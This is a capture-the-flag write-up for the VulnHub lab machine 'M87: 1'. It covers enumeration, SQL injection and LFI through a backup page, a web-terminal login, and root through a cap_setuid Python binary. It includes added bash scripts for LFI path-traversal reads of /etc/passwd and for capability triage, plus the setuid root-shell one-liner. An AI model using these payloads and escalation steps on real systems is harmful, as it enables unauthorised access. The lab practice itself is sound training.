Hey folks! Today we have a boot2root challenge, 'M87: 1', a VulnHub VM created by 'mindsflee'. It's an easy box, and here is the link where you can download the VM: https://www.vulnhub.com/entry/m87-1,595/
1.) Target Discovery
# netdiscover -i wlan0
With netdiscover we get the IP address of the VM, which is 192.168.1.4.
2.) Port Scanning and Service Detection
# nmap -sTV -p- 192.168.1.4
nmap shows two open ports, 80 and 9090, both serving HTTP; port 22 is filtered, so there is no SSH to go after and the web services are the way in.
3.) HTTP Enumeration
Port 80 and port 9090 each serve a different login page, so it looks like more than one web application is running on this server.
For directory brute-forcing I fired up gobuster, and in the results I found an admin directory.
The admin directory has yet another login page, so to enumerate further I ran gobuster again against the admin directory, and it turned up a backup directory inside it.
The backup directory has another login form, but this one looked more interesting, so I did some fuzzing and enumeration and found that the page also accepts other parameters, namely ?id= and ?file=.
The id parameter is injectable: SQL passed through it reaches the database query, so the page is vulnerable to SQL injection.
The file parameter found during fuzzing leads to LFI, and by reading files through it I found that there is only one regular user on the box, charlotte.
Now we have two vulnerabilities, and it's time to exploit them. First I used sqlmap to dump data from the database.
With sqlmap we got a bunch of usernames and passwords, so I tried each of them against the web login on port 9090, but none of them worked.
Recall that the LFI showed only one local user on this box, charlotte, so I used charlotte as the username with the admin's password from the SQL injection dump:
charlotte : 15TheDm1n4L1f3
That logged us in, and the site on port 9090 gives us a terminal in the browser.
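Here is an added example of turning the ?file= LFI into the user list described above; it is not code from the original write-up. The target URL, the parameter name and the traversal payloads are assumptions (the write-up does not give the script name), and the /etc/passwd sample is constructed.

```shell
#!/usr/bin/env bash
# Added example, not part of the original M87 write-up.
# Goal: read /etc/passwd through an LFI parameter and keep only the
# accounts a person can log in as (the step that found "charlotte").

# Constructed /etc/passwd sample: root, system accounts, one regular user.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
charlotte:x:1000:1000:charlotte:/home/charlotte:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin'

# Print regular accounts from passwd text on stdin: UID >= 1000 and a real
# login shell. nobody (65534) is dropped because its shell is nologin, and
# root is always there, so it is not counted as a user to target.
list_login_users() {
  awk -F: '$3 >= 1000 && $7 !~ /(nologin|false)$/ { print $1 }'
}

# Fetch /etc/passwd through an LFI parameter, trying a few traversal forms
# (assumed payloads; which one works depends on how the page builds the path).
# Prints the body of the first response that contains the root entry.
# This needs the target on the network, so the offline run below skips it.
lfi_read_passwd() {
  local base_url="$1" param="$2" payload body
  for payload in \
    '/etc/passwd' \
    '../../../../etc/passwd' \
    '....//....//....//....//etc/passwd'; do
    body=$(curl -s --max-time 10 "${base_url}?${param}=${payload}")
    if printf '%s\n' "$body" | grep -q '^root:x:0:0:'; then
      printf '%s\n' "$body"
      return 0
    fi
  done
  return 1
}

# Offline run against the constructed sample. Against the real box (assumed
# URL) it would be:
#   lfi_read_passwd 'http://192.168.1.4/admin/backup/' file | list_login_users
printf '%s\n' "$SAMPLE_PASSWD" | list_login_users
```

The filter on the shell field is what keeps service accounts with high UIDs out of the list; if the box uses a non-standard interactive shell it still passes, since only nologin and false are excluded.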
4.) Privilege Escalation
The screenshot may be hard to read, so here is the command I ran to look for file capabilities:
$ getcap -r / 2>/dev/null
It reported a capability set on /usr/bin/old. The binary is a Python interpreter, and the capability it carries lets it call setuid, so a one-liner is enough to become root:
$ /usr/bin/old -c 'import os; os.setuid(0); os.system("/bin/bash")'
That gives us a root shell and the proof.txt flag.
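As an added example (not code from the original write-up), here is the capability triage behind that step: a filter that reads getcap output and reports only the capabilities that can lead to privilege escalation, plus the Python setuid trick wrapped in a function that first checks the binary really is a Python interpreter. The getcap sample lines are constructed, and the list of dangerous capabilities is my own selection.

```shell
#!/usr/bin/env bash
# Added example, not part of the original M87 write-up.
# Part 1: pick out the dangerous file capabilities from `getcap -r /` output.
# Part 2: the cap_setuid + Python interpreter escalation as a function.

# Constructed getcap output. Both libcap output styles are included:
# the older "path = caps+flags" and the newer "path caps=flags".
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/old = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/opt/reader cap_dac_read_search=ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/opt/odd cap_setuid,cap_setgid=i'

# Read getcap lines on stdin; print "path capability" for each capability that
# is on the escalation list and is in the permitted set (flags contain p).
# Inheritable-only entries (=i) are skipped: running them gains nothing.
# For the Python trick the set must also be effective (+ep), as in the sample.
# Paths containing spaces are not handled.
risky_caps() {
  awk '
    BEGIN {
      list = "cap_setuid cap_setgid cap_dac_override cap_dac_read_search"
      list = list " cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown"
      list = list " cap_fowner cap_sys_rawio"
      n = split(list, arr, " ")
      for (i = 1; i <= n; i++) want[arr[i]] = 1
    }
    {
      path = $1
      rest = $0
      sub(/^[^ ]+ +/, "", rest)       # drop the path
      sub(/^= +/, "", rest)            # drop the " = " of the older format
      nc = split(rest, clause, " ")    # clauses like "cap_a,cap_b+ep" "cap_c=i"
      for (i = 1; i <= nc; i++) {
        if (!match(clause[i], /[+=]/)) continue
        names = substr(clause[i], 1, RSTART - 1)
        flags = substr(clause[i], RSTART + 1)
        if (flags !~ /p/) continue     # not permitted: not usable on exec
        m = split(names, nm, ",")
        for (j = 1; j <= m; j++) if (nm[j] in want) print path, nm[j]
      }
    }'
}

# Part 2: the escalation used in the write-up, as a function. It only tries
# the setuid call if the binary really is a Python interpreter. This spawns a
# root shell on the target, so it is not part of the offline run below.
python_cap_root_shell() {
  local bin="$1"
  if ! "$bin" -c 'import sys' 2>/dev/null; then
    echo "$bin is not a Python interpreter" >&2
    return 1
  fi
  "$bin" -c 'import os; os.setuid(0); os.system("/bin/bash")'
}

# Offline run against the constructed sample. On the box you would pipe the
# real scan in instead:
#   getcap -r / 2>/dev/null | risky_caps
printf '%s\n' "$SAMPLE_GETCAP" | risky_caps
```

Against the sample this reports /usr/bin/old with cap_setuid and /opt/reader with cap_dac_read_search, and ignores the ping-style cap_net_raw entries and the inheritable-only line, which is the distinction you want when a getcap listing is long.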
Rooted !!! :)